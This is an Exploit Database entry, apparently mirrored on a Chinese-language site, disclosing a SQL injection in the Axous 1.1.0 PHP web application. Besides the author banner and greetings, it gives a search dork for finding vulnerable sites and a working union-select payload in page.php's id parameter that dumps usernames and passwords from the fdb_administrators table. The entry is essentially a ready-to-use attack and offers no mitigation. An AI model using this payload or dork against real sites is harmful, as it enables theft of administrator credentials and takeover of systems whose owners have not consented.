Axous 1.1.0 – SQL Injection

• Exploit Database
• 42 阅读

• 作者： H4ckCity Secuirty TeaM
  日期： 2012-04-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18793/

• ########################################################################################
  ##
  # Exploit Title : Axous 1.1.0 SQL Injection Vulnerabilitiy #
  ##
  # Author: Secure-Land Security Team#
  ##
  # Discovered By : farbodmahini #
  ##
  # Home: Secure-Land.net#
  ##
  # Version : All Version#
  ##
  # Vendor Link : www.axous.com#
  ##
  # Contact : farbodmahini@yahoo.fr , farbodmahini@gmail.com #
  ##
  # Security Risk : High #
  ##
  #DorK : intext:"Powered by Axous 1.1.0"#
  ##
  ##
  ########################################################################################
  #Exploit:
  #
  #
  #http://[target]/page.php?id=[SQL]
  #
  #[~] SQL :
  #
  #page.php?id=-1+union+select+1,group_concat(id,0x3a,username,0x3a,password),3+
  #from+fdb_administrators--
  #
  ########################################################################################
  ##
  # Special Thanks : 2MzRp-Mikili-M.Prince-0x0ptim0us#
  ##
  ########################################################################################
  ##
  # Greetz : All Secure-Land Members - Packetstorm - 1337day - exploit-id#
  ##
  ########################################################################################